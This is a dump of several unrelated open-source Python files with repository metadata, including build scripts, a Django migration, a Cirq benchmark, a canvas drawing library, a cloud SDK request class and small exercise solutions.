cbabaab8f53d23cfaa2ecbf319388276b6172f67 | 433d8d457ed431b9ad38e3ed8ed6e441b7caa334 | /bin/generate_zippylog_message_classes | 92c4f25b4a7ff5fa92a47278254795a8f91aaf8f | [
"Apache-2.0"
] | permissive | indygreg/zippylog | 365f4f95dd2c9f8743180178fa90d66b0611cc71 | 5efc10b28a3e9d5f4df6c2014e7121d689291a70 | refs/heads/master | 2020-05-09T17:15:23.063121 | 2012-09-06T23:53:19 | 2012-09-06T23:53:19 | 795,523 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,674 | #!/usr/bin/python
# Copyright 2011 Gregory Szorc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script is meant to be used by zippylog developers only.
# it generates the autogenerated protocol buffer classes for the messages
# defined by zippylog itself
# it is assumed this script is executed from within a source distribution
from json import dump, load
from os import walk
from os.path import exists, join, dirname, splitext
from shutil import copy2, rmtree
from subprocess import Popen
from sys import path
from tempfile import mkdtemp
base_dir = dirname(dirname(__file__))
path.insert(0, join(base_dir, 'lib', 'py'))
proto_dir = join(base_dir, 'proto')
zippylog_compile = join(base_dir, 'bin', 'zippylog_compile')
state_file = join(proto_dir, 'zippylog-state.json')
out_dir = mkdtemp()
print 'temp output directory: %s' % out_dir
if exists(state_file):
copy2(state_file, join(out_dir, 'zippylog-state.json'))
compile_args = [ zippylog_compile, '--cpp-namespace', 'zippylog' ]
compile_args.append(proto_dir)
compile_args.append(out_dir)
p = Popen(compile_args)
if p.wait() != 0:
print 'zippylog_compile did not execute successfully'
exit(1)
copy2(join(out_dir, 'zippylog-state.json'), state_file)
for root, dirs, files in walk(join(out_dir, 'py', 'zippylog')):
for f in filter(lambda x: x[-3:] == '.py', files):
src = join(root, f)
dst = src[len(out_dir)+1:]
copy2(src, join(base_dir, 'lib', dst))
for root, dirs, files in walk(join(out_dir, 'cpp', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.hpp', '.cc', '.cpp'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
for root, dirs, files in walk(join(out_dir, 'lua', 'zippylog')):
for f in filter(lambda x: splitext(x)[1] in ['.h', '.cc'], files):
src = join(root, f)
dst = src[len(out_dir)+5:]
copy2(src, join(base_dir, 'src', dst))
copy2(join(out_dir, 'lua', 'lua-protobuf.h'), join(base_dir, 'src', 'lua-protobuf.h'))
copy2(join(out_dir, 'lua', 'lua-protobuf.cc'), join(base_dir, 'src', 'lua-protobuf.cc'))
rmtree(out_dir)
| [
"[email protected]"
] | ||
992b9fcf1f9245559736c39f1ff5f2a4fad0a1a8 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/233/44940/submittedfiles/testes.py | c32c53695e128c23eb21837b58d93558de20eeb8 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103 | py | # -*- coding: utf-8 -*-
#COMECE AQUI ABAIXO
s='Um elefante incomoda muita gente'
print(a.capitalize(s)) | [
"[email protected]"
] | |
e724a3c48e595bf7c48a83851d2e887104b40271 | 605d63d23bc2e07eb054979a14557d469787877e | /atest/testdata/core/resources_and_variables/variables_imported_by_resource.py | 73662bdefa9dd586742fe3ebc59da8b64bfb1dc2 | [
"Apache-2.0",
"CC-BY-3.0"
] | permissive | robotframework/robotframework | 407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf | cf896995f822f571c33dc5651d51365778b1cf40 | refs/heads/master | 2023-08-29T03:19:00.734810 | 2023-08-27T18:14:48 | 2023-08-28T18:14:11 | 21,273,155 | 8,635 | 2,623 | Apache-2.0 | 2023-09-05T04:58:08 | 2014-06-27T11:10:38 | Python | UTF-8 | Python | false | false | 82 | py | variables_imported_by_resource = 'Variable from variables_imported_by_resource.py' | [
"[email protected]"
] | |
14fcaeb305d053f5521da45fd3ee2dd1a9697fba | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R1/benchmark/startCirq155.py | 094f1a6799a76414621d8cdf570c3e79f509ea54 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,673 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=3
# total number=29
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
from cirq.contrib.svg import SVGCircuit
# Symbols for the rotation angles in the QAOA circuit.
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.rx(-0.09738937226128368).on(input_qubit[2])) # number=2
c.append(cirq.H.on(input_qubit[1])) # number=3
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=4
c.append(cirq.Y.on(input_qubit[1])) # number=15
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=10
c.append(cirq.H.on(input_qubit[1])) # number=19
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=20
c.append(cirq.H.on(input_qubit[1])) # number=21
c.append(cirq.H.on(input_qubit[1])) # number=26
c.append(cirq.CZ.on(input_qubit[0],input_qubit[1])) # number=27
c.append(cirq.H.on(input_qubit[1])) # number=28
c.append(cirq.X.on(input_qubit[1])) # number=23
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=24
c.append(cirq.CNOT.on(input_qubit[0],input_qubit[1])) # number=18
c.append(cirq.Z.on(input_qubit[1])) # number=11
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=12
c.append(cirq.Y.on(input_qubit[1])) # number=14
c.append(cirq.CNOT.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.X.on(input_qubit[1])) # number=6
c.append(cirq.Z.on(input_qubit[1])) # number=8
c.append(cirq.X.on(input_qubit[1])) # number=7
c.append(cirq.rx(-2.42845112122491).on(input_qubit[1])) # number=25
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq155.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
627cf8253da28f9a0b598a5ce5132606b0f3c62b | a1431c25ebd62daead742e0120a16253c4cf67ca | /django/movie/migrations/0002_auto_20190910_2053.py | 212f7307d9b37543ceb71c884a998090b3067fed | [] | no_license | KonradMarzec1991/my_MDB | f840cbf495c23272b3e39db68c241219a60d63bd | d77339a4c37a3d7ae21b6d28bd9644ce15130f10 | refs/heads/master | 2022-04-29T10:15:37.109422 | 2019-11-03T20:13:57 | 2019-11-03T20:13:57 | 207,375,063 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,230 | py | # Generated by Django 2.2.5 on 2019-09-10 20:53
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('movie', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=140)),
('last_name', models.CharField(max_length=140)),
('born', models.DateField()),
('died', models.DateField(blank=True, null=True)),
],
options={
'ordering': ('last_name', 'first_name'),
},
),
migrations.AlterModelOptions(
name='movie',
options={'ordering': ('-year', 'title')},
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=140)),
('movie', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Movie')),
('person', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='movie.Person')),
],
options={
'unique_together': {('movie', 'person', 'name')},
},
),
migrations.AddField(
model_name='movie',
name='actors',
field=models.ManyToManyField(blank=True, related_name='acting_credits', through='movie.Role', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='director',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='directed', to='movie.Person'),
),
migrations.AddField(
model_name='movie',
name='writers',
field=models.ManyToManyField(blank=True, related_name='writing_credits', to='movie.Person'),
),
]
| [
"[email protected]"
] | |
ca059aa8c32a39ed214dc0199c72e92922850c57 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02677/s955369222.py | 6cf51b7ad9b75384f56164aff5faa203ac653ac3 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 465 | py | """AtCoder."""
import math
a, b, h, m = [int(v) for v in input().split(' ')]
class Point:
def __init__(self, r, v):
self.r = r
self.w = (2 * math.pi) / v
def get_pos(self, t):
wt = self.w * t
return self.r * math.cos(wt), self.r * math.sin(wt)
p1 = Point(a, 12 * 60)
p2 = Point(b, 60)
minute = (h * 60) + m
x1, y1 = p1.get_pos(minute)
x2, y2 = p2.get_pos(minute)
print(math.sqrt(pow(x1 - x2, 2) + pow(y1 - y2, 2)))
| [
"[email protected]"
] | |
2f5a0fdf8f81ef767fc19d5a34d2bbaeb635d01d | 646f2a135dc8ba97b2fc7436194dcab2a8f0ae8c | /autocomplete_light/channel/base.py | 8ba3f984df5a1c0a22922c1c42937c3567e22822 | [
"MIT"
] | permissive | pix0r/django-autocomplete-light | 9f55252d4aa4fb8a28471772a98e793b171cdb0c | f1026dfe49934065206ca1fdae46289c68e8c231 | refs/heads/master | 2020-12-30T18:50:36.304623 | 2012-05-30T09:39:24 | 2012-05-30T09:39:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,932 | py | """
The channel.base module provides a channel class which you can extend to make
your own channel. It also serves as default channel class.
"""
from django.core import urlresolvers
from django.template import loader
from django.utils.translation import ugettext_lazy as _
__all__ = ('ChannelBase',)
class ChannelBase(object):
"""
A basic implementation of a channel, which should fit most use cases.
Attributes:
model
The model class this channel serves. If None, a new class will be
created in registry.register, and the model attribute will be set in
that subclass. So you probably don't need to worry about it, just know
that it's there for you to use.
result_template
The template to use in result_as_html method, to render a single
autocomplete suggestion. By default, it is
autocomplete_light/channelname/result.html or
autocomplete_light/result.html.
autocomplete_template
The template to use in render_autocomplete method, to render the
autocomplete box. By default, it is
autocomplete_light/channelname/autocomplete.html or
autocomplete_light/autocomplete.html.
search_field
The name of the field that the default implementation of query_filter
uses. Default is 'name'.
limit_results
The number of results that this channel should return. For example, if
query_filter returns 50 results and that limit_results is 20, then the
first 20 of 50 results will be rendered. Default is 20.
bootstrap
The name of the bootstrap kind. By default, deck.js will only
initialize decks for wrappers that have data-bootstrap="normal". If
you want to implement your own bootstrapping logic in javascript,
then you set bootstrap to anything that is not "normal". Default is
'normal'.
placeholder
The initial text in the autocomplete text input.
"""
model = None
search_field = 'name'
limit_results = 20
bootstrap = 'normal'
placeholder = _(u'type some text to search in this autocomplete')
result_template = None
autocomplete_template = None
def __init__(self):
"""
Set result_template and autocomplete_template if necessary.
"""
name = self.__class__.__name__.lower()
if not self.result_template:
self.result_template = [
'autocomplete_light/%s/result.html' % name,
'autocomplete_light/result.html',
]
if not self.autocomplete_template:
self.autocomplete_template = [
'autocomplete_light/%s/autocomplete.html' % name,
'autocomplete_light/autocomplete.html',
]
self.request = None
def get_absolute_url(self):
"""
Return the absolute url for this channel, using
autocomplete_light_channel url
"""
return urlresolvers.reverse('autocomplete_light_channel', args=(
self.__class__.__name__,))
def as_dict(self):
"""
Return a dict of variables for this channel, it is used by javascript.
"""
return {
'url': self.get_absolute_url(),
'name': self.__class__.__name__
}
def init_for_request(self, request, *args, **kwargs):
"""
Set self.request, self.args and self.kwargs, useful in query_filter.
"""
self.request = request
self.args = args
self.kwargs = kwargs
def query_filter(self, results):
"""
Filter results using the request.
By default this will expect results to be a queryset, and will filter
it with self.search_field + '__icontains'=self.request['q'].
"""
q = self.request.GET.get('q', None)
if q:
kwargs = {"%s__icontains" % self.search_field: q}
results = results.filter(**kwargs)
return results
def values_filter(self, results, values):
"""
Filter results based on a list of values.
By default this will expect values to be an iterable of model ids, and
results to be a queryset. Thus, it will return a queryset where pks are
in values.
"""
results = results.filter(pk__in=values)
return results
def get_queryset(self):
"""
Return a queryset for the channel model.
"""
return self.model.objects.all()
def get_results(self, values=None):
"""
Return an iterable of result to display in the autocomplete box.
By default, it will:
- call self.get_queryset(),
- call values_filter() if values is not None,
- call query_filter() if self.request is set,
- call order_results(),
- return a slice from offset 0 to self.limit_results.
"""
results = self.get_queryset()
if values is not None:
# used by the widget to prerender existing values
results = self.values_filter(results, values)
elif self.request:
# used by the autocomplete
results = self.query_filter(results)
return self.order_results(results)[0:self.limit_results]
def order_results(self, results):
"""
Return the result list after ordering.
By default, it expects results to be a queryset and order it by
search_field.
"""
return results.order_by(self.search_field).distinct()
def are_valid(self, values):
"""
Return True if the values are valid.
By default, expect values to be a list of object ids, return True if
all the ids are found in the queryset.
"""
return self.get_queryset().filter(pk__in=values).count() == len(values)
def result_as_html(self, result, extra_context=None):
"""
Return the html representation of a result for display in the deck
and autocomplete box.
By default, render result_template with channel and result in the
context.
"""
context = {
'channel': self,
'result': result,
'value': self.result_as_value(result),
}
context.update(extra_context or {})
return loader.render_to_string(self.result_template, context)
def result_as_value(self, result):
"""
Return the value that should be set to the widget field for a result.
By default, return result.pk.
"""
return result.pk
def render_autocomplete(self):
"""
Render the autocomplete suggestion box.
By default, render self.autocomplete_template with the channel in the
context.
"""
return loader.render_to_string(self.autocomplete_template, {
'channel': self,
})
| [
"[email protected]"
] | |
070eb0eb248d00b0725d085b1937cb7a5da23da2 | 4351c4eed4c5b4ab0d477a989c96c0a0cfeda1e5 | /omnicanvas/canvas.py | 1dc679a7bd73f1dd22fd0d3b27ab18dc75d8b334 | [
"MIT"
] | permissive | samirelanduk/omnicanvas | b601eb5bbeb868211cdf195ad4168ea8d0ea3c25 | edc22ec802da6188759fbbbb30f0dd44aabb3a7a | refs/heads/master | 2020-12-29T02:37:48.896323 | 2017-01-22T21:40:43 | 2017-01-22T21:40:43 | 53,693,336 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,171 | py | """This module contains the main Canvas class."""
from .color import process_color
from . import graphics
from . import svg
class Canvas:
"""A backdrop on which other :py:class:`.Graphic` objects are painted.
:param width: The canvas's width in pixels.
:param height: The canvas's height in pixels.
:param background_color: The canvas's background colour - the default is\
white"""
def __init__(self, width, height, background_color=None):
if isinstance(width, float):
width = round(width)
if not isinstance(width, int):
raise TypeError("Width must be numeric, not '%s'" % width)
self._width = width
if isinstance(height, float):
height = round(height)
if not isinstance(height, int):
raise TypeError("Height must be numeric, not '%s'" % height)
self._height = height
if background_color is None:
self._background_color = None
else:
self._background_color = process_color(background_color)
self._graphics = []
def __repr__(self):
return "<Canvas %i×%i (%i Graphics)>" % (
self._width, self._height, len(self._graphics)
)
def width(self, width=None):
"""The canvas's width in pixels. Passing a value will update the width
property.
:param width: If given, the canvas's width will be set to this.
:rtype: ``int``"""
if width is None:
return self._width
else:
if isinstance(width, float):
width = round(width)
if not isinstance(width, int):
raise TypeError("Width must be numeric, not '%s'" % width)
self._width = width
def height(self, height=None):
"""The canvas's height in pixels. Passing a value will update the height
property.
:param height: If given, the canvas's height will be set to this.
:rtype: ``int``"""
if height is None:
return self._height
else:
if isinstance(height, float):
height = round(height)
if not isinstance(height, int):
raise TypeError("Height must be numeric, not '%s'" % height)
self._height = height
def background_color(self, background_color=None):
"""The canvas's background colour, as a hex string. Passing a value will
update the background_color property (as a hex string).
:param str background_color: If given, the canvas's background_color \
will be set to this.
:rtype: ``str``"""
if background_color is None:
return self._background_color
else:
self._background_color = process_color(background_color)
def graphics(self):
"""A list of all the :py:class:`.Graphic` objects on this canvas.
:rtype: ``list``"""
return list(self._graphics)
def get_graphic_by_name(self, name):
"""Searches the canvas's :py:class:`.Graphic` objects and returns the
first one with a matching name. Returns ``None`` if there are no
matches.
:param str name: The name to search by.
:rtype: str"""
if not isinstance(name, str):
raise TypeError(
"Can only search for str name, not '%s'" % str(name)
)
for graphic in self.graphics():
if graphic.name() == name:
return graphic
def get_graphics_by_name(self, name):
"""Searches the canvas's :py:class:`.Graphic` objects and returns all
the ones with a matching name. Returns an empty list if there are no
matches.
:param str name: The name to search by.
:returns: ``list`` of :py:class:`.Graphic`"""
if not isinstance(name, str):
raise TypeError(
"Can only search for str name, not '%s'" % str(name)
)
return [g for g in self.graphics() if g.name() == name]
def move_graphic_forward(self, graphic):
"""Moves a :py:class:`.Graphic` forward - that is, closer to the viewer.
This method will make the :py:class:`.Graphic` more visible if it was
occluded.
:param Graphic graphic: The :py:class:`.Graphic` to move forward."""
if not isinstance(graphic, graphics.Graphic):
raise TypeError("%s is not a Graphic" % str(graphic))
if not graphic is self.graphics()[-1]:
index = self.graphics().index(graphic)
self._graphics[index], self._graphics[index + 1] = (
self._graphics[index + 1], self._graphics[index]
)
def move_graphic_backward(self, graphic):
"""Shifts a :py:class:`.Graphic` backward - away from the viewer. This
method will hide the :py:class:`.Graphic` behind others.
:param Graphic graphic: The :py:class:`.Graphic` to move backward."""
if not isinstance(graphic, graphics.Graphic):
raise TypeError("%s is not a Graphic" % str(graphic))
if not graphic is self.graphics()[0]:
index = self.graphics().index(graphic)
if index == -1:
raise ValueError("%s is not a Graphic in %s" % (
graphic, self
))
self._graphics[index], self._graphics[index - 1] = (
self._graphics[index - 1], self._graphics[index]
)
def add_rectangle(self, *args, **kwargs):
"""Adds a :py:class:`.Rectangle` to the canvas.
:param x: The x-coordinate of the Rectangle's upper left corner.
:param y: The y-coordinate of the Rectangle's upper left corner.
:param width: The Rectangle's width.
:param height: The Rectangle's height.
:param str fill_color: The Rectangle's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Rectangle in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Rectangle.
:rtype: :py:class:`.Rectangle`"""
self._graphics.append(graphics.Rectangle(*args, **kwargs))
return self._graphics[-1]
def add_line(self, *args, **kwargs):
"""Adds a :py:class:`.Line` to the canvas.
:param x1: The x-coordinate of the Line's start point.
:param y1: The y-coordinate of the Line's start point.
:param x2: The x-coordinate of the Line's end point.
:param y2: The y-coordinate of the Line's end point.
:param line_width: The width of the Line in pixels.
:param str line_style: The pattern of the Line. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the Line.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Line.
:rtype: :py:class:`.Line`"""
self._graphics.append(graphics.Line(*args, **kwargs))
return self._graphics[-1]
def add_oval(self, *args, **kwargs):
"""Adds a :py:class:`.Oval` to the canvas.
:param x: The x-coordinate of the Oval's bounding rectangle upper left corner.
:param y: The y-coordinate of the Oval's bounding rectangle upper left corner.
:param width: The bounding rectangle's width.
:param height: The bounding rectangle's height.
:param str fill_color: The Oval's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Oval in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Oval.
:rtype: :py:class:`.Oval`"""
self._graphics.append(graphics.Oval(*args, **kwargs))
return self._graphics[-1]
def add_polygon(self, *args, **kwargs):
"""Adds a :py:class:`.Polygon` to the canvas.
:param \*points: The alternating x and y values of the Polygon's\
corners.
:param str fill_color: The Polygon's interior colour.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: The width of the edge of the Polygon in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Polygon.
:rtype: :py:class:`.Polygon`"""
self._graphics.append(graphics.Polygon(*args, **kwargs))
return self._graphics[-1]
def add_text(self, *args, **kwargs):
"""Adds a :py:class:`.Text` to the canvas.
:param x: The Text's x location.
:param y: The Text's y location.
:param str text: The text to display.
:param font_size: The font size of the Text when displayed.
:param horizontal_align: The horizontal alignment of the Text. Acceptable\
values are ``left``, ``center`` (default) and ``right``.
:param vertical_align: The vertical alignment of the Text. Acceptable\
values are ``top``, ``middle`` (default) and ``bottom``.
:param str fill_color: Defaults to '#FFFFFF'.
:param opacity: The degree of transparency, from 0 to 1 (0 being\
invisible).
:param line_width: Defaults to 0.
:param str line_style: The line pattern. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: Defaults to '#000000'.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle), in degrees.
:param dict data: Any data to be associated with the Text.
:rtype: :py:class:`.Text`"""
self._graphics.append(graphics.Text(*args, **kwargs))
return self._graphics[-1]
def add_polyline(self, *args, **kwargs):
"""Adds a :py:class:`.Polyline` to the canvas.
:param \*points: The alternating x and y values of the Polyline's\
corners.
:param line_width: The width of the edge of the Polyline in pixels.
:param str line_style: The pattern of the edges. Acceptable values are\
``-`` (default), ``..`` (dotted) or ``--`` (dashed).
:param str line_color: The colour of the edge.
:param tuple rotation: Any rotation to be applied, in the format\
(x of rotation point, y of rotation point, angle).
:param dict data: Any data to be associated with the Polyline.
:rtype: :py:class:`.Polyline`"""
self._graphics.append(graphics.Polyline(*args, **kwargs))
return self._graphics[-1]
def save(self, path):
"""Saves the canvas to file as an SVG file.
:param str path: The location and filename to save to."""
with open(path, "w") as f:
f.write(self.to_svg())
to_svg = svg.generate_canvas_svg
"""Returns the SVG text of the canvas.
Any ``data`` attributes of the Graphics contained will be rendered as SVG
attributes.
:rtype: ``str``"""
| [
"[email protected]"
] | |
a585d4489cb8b4295cdbaa734255fddff64656b5 | 416f598c62277659f787a37d06f3ebc633a79d53 | /every_election/apps/organisations/migrations/0036_auto_20180606_1035.py | bfa7659c15a88e941da82db96db06e8575c0edfb | [] | no_license | chris48s/EveryElection | 53b6d807e97b2a8b9a943dedcc5ff6ecc65d20fc | 38192a075ae359b91e2aa352fb3886c6c93d3337 | refs/heads/master | 2021-01-22T19:49:15.898338 | 2018-08-17T09:11:42 | 2018-08-17T09:11:42 | 85,244,907 | 0 | 0 | null | 2017-03-16T21:53:29 | 2017-03-16T21:53:28 | null | UTF-8 | Python | false | false | 484 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-06 10:35
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('organisations', '0035_rename_divset_constraint'),
]
operations = [
migrations.AlterModelOptions(
name='organisation',
options={'get_latest_by': 'start_date', 'ordering': ('official_name', '-start_date')},
),
]
| [
"[email protected]"
] | |
0216d00c4a0280404201ed358bfc7c240952ec5a | 0202d8faff21f24e468654b3da56ca16457ff5b3 | /entrant/abc133/abc133-c.py | a93b0c17761a620084c2519ce520de7d390fcc5d | [] | no_license | ryogoOkura/atcoder | a3d8d052c6424db26994444eca1ebaa3efbd3e21 | 2865b42bbdb50d83bf129fd868083c2363e92024 | refs/heads/master | 2021-06-24T06:07:32.290393 | 2021-01-02T13:39:24 | 2021-01-02T13:39:24 | 187,552,021 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | l,r=map(int,input().split())
if (l//2019) == (r//2019):
l,r=l%2019,r%2019
ans=2018
for i in range(l,r):
for j in range(i+1,r+1):
tmp=(i*j)%2019
if tmp<ans:
ans=tmp
print(ans)
else:
print(0)
| [
"[email protected]"
] | |
39ceb9d36775a75edf35014ee07e0ae39affc16f | f8f2536fa873afa43dafe0217faa9134e57c8a1e | /aliyun-python-sdk-hbr/aliyunsdkhbr/request/v20170908/DescribeHanaRestoresRequest.py | 29b991a2c5cbecc928a581fe3e4ae75d2966a997 | [
"Apache-2.0"
] | permissive | Sunnywillow/aliyun-openapi-python-sdk | 40b1b17ca39467e9f8405cb2ca08a85b9befd533 | 6855864a1d46f818d73f5870da0efec2b820baf5 | refs/heads/master | 2022-12-04T02:22:27.550198 | 2020-08-20T04:11:34 | 2020-08-20T04:11:34 | 288,944,896 | 1 | 0 | NOASSERTION | 2020-08-20T08:04:01 | 2020-08-20T08:04:01 | null | UTF-8 | Python | false | false | 2,536 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
class DescribeHanaRestoresRequest(RpcRequest):
	"""RPC request for the Aliyun HBR ``DescribeHanaRestores`` API (version 2017-09-08).

	Lists SAP HANA restore jobs.  Each ``get_X``/``set_X`` pair below simply
	reads/writes the corresponding HTTP query parameter; no client-side
	validation is performed.
	"""
	def __init__(self):
		# Product 'hbr', API version '2017-09-08', action name, endpoint type.
		RpcRequest.__init__(self, 'hbr', '2017-09-08', 'DescribeHanaRestores','hbr')
		self.set_protocol_type('https')
	# Backup vault that holds the HANA backups.
	def get_VaultId(self):
		return self.get_query_params().get('VaultId')
	def set_VaultId(self,VaultId):
		self.add_query_param('VaultId',VaultId)
	# HANA database the restore targets.
	def get_DatabaseName(self):
		return self.get_query_params().get('DatabaseName')
	def set_DatabaseName(self,DatabaseName):
		self.add_query_param('DatabaseName',DatabaseName)
	# Backup the restore was created from.
	def get_BackupId(self):
		return self.get_query_params().get('BackupId')
	def set_BackupId(self,BackupId):
		self.add_query_param('BackupId',BackupId)
	# Pagination: number of entries per page.
	def get_PageSize(self):
		return self.get_query_params().get('PageSize')
	def set_PageSize(self,PageSize):
		self.add_query_param('PageSize',PageSize)
	# Filter by restore job status.
	def get_RestoreStatus(self):
		return self.get_query_params().get('RestoreStatus')
	def set_RestoreStatus(self,RestoreStatus):
		self.add_query_param('RestoreStatus',RestoreStatus)
	# Filter by a specific restore job id.
	def get_RestoreId(self):
		return self.get_query_params().get('RestoreId')
	def set_RestoreId(self,RestoreId):
		self.add_query_param('RestoreId',RestoreId)
	# HANA cluster the restore belongs to.
	def get_ClusterId(self):
		return self.get_query_params().get('ClusterId')
	def set_ClusterId(self,ClusterId):
		self.add_query_param('ClusterId',ClusterId)
	# Pagination: 1-based page index.
	def get_PageNumber(self):
		return self.get_query_params().get('PageNumber')
	def set_PageNumber(self,PageNumber):
		self.add_query_param('PageNumber',PageNumber)
	# Opaque continuation/idempotency token.
	def get_Token(self):
		return self.get_query_params().get('Token')
def set_Token(self,Token):
self.add_query_param('Token',Token) | [
"[email protected]"
] | |
e7b2527e9d44eef72048f1bb2f0a78a12a668f9b | 77639380e2c33eee09179f372632bcb57d3f7e3f | /favorita/base_xgb_model.py | d550fd5b81efab514e96961f156451c648bd8a32 | [] | no_license | razmik/demand_forecast_walmart | b8f5c4aaa3cb6dccae102e4ca19f1131131a9f26 | 56292bfbeebc1d3d4962e3ee26d05be2aebd5f4c | refs/heads/master | 2023-01-22T12:30:18.129486 | 2020-08-10T10:44:12 | 2020-08-10T10:44:12 | 283,923,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,399 | py | """
Author: Rashmika Nawaratne
Date: 05-Aug-20 at 4:53 PM
"""
import pandas as pd
import numpy as np
from datetime import datetime
import time
import gc
from xgboost import XGBRegressor
from xgboost import Booster
import matplotlib.pyplot as plt
from favorita.load_data import Data
from favorita.evaluation import Evaluator
